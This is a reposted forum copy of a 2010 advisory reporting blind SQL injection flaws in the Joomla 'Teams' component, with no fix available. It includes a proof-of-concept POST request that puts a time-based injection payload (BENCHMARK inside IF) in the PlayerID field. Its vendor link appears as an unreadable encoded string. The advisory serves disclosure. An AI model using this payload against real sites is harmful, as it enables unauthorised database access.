-
-
[转帖]Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities
-
发表于: 2010-8-11 12:18 2056
-
[转帖]Joomla Component Teams Multiple Blind SQL Injection Vulnerabilities
2010-8-11 12:18
2056
Teams 1_1028_100809_1711 Joomla Component Multiple Blind SQL Injection Vulnerabilities
Name Teams
Vendor 698K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6G2L8$3#2D9j5h3#2G2i4K6u0W2j5$3!0E0i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
Versions Affected 1_1028_100809_1711
Name Teams
Vendor 698K9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3A6G2L8$3#2D9j5h3#2G2i4K6u0W2j5$3!0E0i4K6t1$3L8X3u0K6M7q4)9K6b7W2)9J5y4X3&6T1M7%4m8Q4x3@1t1`.
Versions Affected 1_1028_100809_1711
X. INDEX I. ABOUT THE APPLICATION II. DESCRIPTION III. ANALYSIS IV. SAMPLE CODE V. FIX I. ABOUT THE APPLICATION ________________________ Teams is a base application for entering leagues, teams, players, uniforms, and games. II. DESCRIPTION _______________ Some parameters are not properly sanitised before being used in SQL queries. III. ANALYSIS _____________ Summary: A) Multiple Blind SQL Injection A) Multiple Blind SQL Injection _______________________________ Many parameters are not properly sanitised before being used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. IV. SAMPLE CODE _______________ A) Multiple Blind SQL Injection POST /index.php HTTP/1.1 Host: targethost Content-Type: application/x-www-form-urlencoded Content-Length: 205 FirstName=mario&LastName=rossi&Notes=sds&TeamNames[1]=on&UniformNumber[1]=1&Active=Y&cid[]=&PlayerID=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(99999999,NULL),NULL)))&option=com_teams&task=save&controller=player V. FIX ______ No fix.
赞赏
他的文章
赞赏
雪币:
留言: